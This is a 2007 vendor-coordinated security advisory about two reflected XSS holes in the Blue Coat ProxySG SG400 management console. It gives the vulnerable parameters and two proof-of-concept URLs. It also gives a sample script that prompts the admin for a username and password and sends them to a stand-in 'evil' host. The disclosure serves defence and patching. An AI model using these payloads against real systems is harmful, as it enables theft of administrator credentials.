PR07-29: Two XSS on Blue Coat ProxySG Management Console
Vulnerability found: 23 July 2007 Vendor informed: 20 August 2007 Vulnerability fixed: 29 October 2007 Advisory publicly released: 1 November 2007 Severity: Medium Description: Blue Coat SG400 is vulnerable to a couple of XSS holes. Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_action/crl_format' / 'name' Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file' Notes: The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run. Successfully tested on: Model: Blue Coat SG400 Software SGOS 4.2.1.6 Software Release ID: 25173 Proof of concept #1: https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00 Injected payload: "<script>alert("XSS")</script>%00 Proof of concept #2: https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Injected payload: <script>alert("XSS")</script><!-- A neat payload to inject instead of a alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site). i.e.: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b </script><!-- Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties. Fixed in: 4.2.6.1, 5.2.2.5 References: http://www.procheckup.com/Vulnerability_2007.php http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)
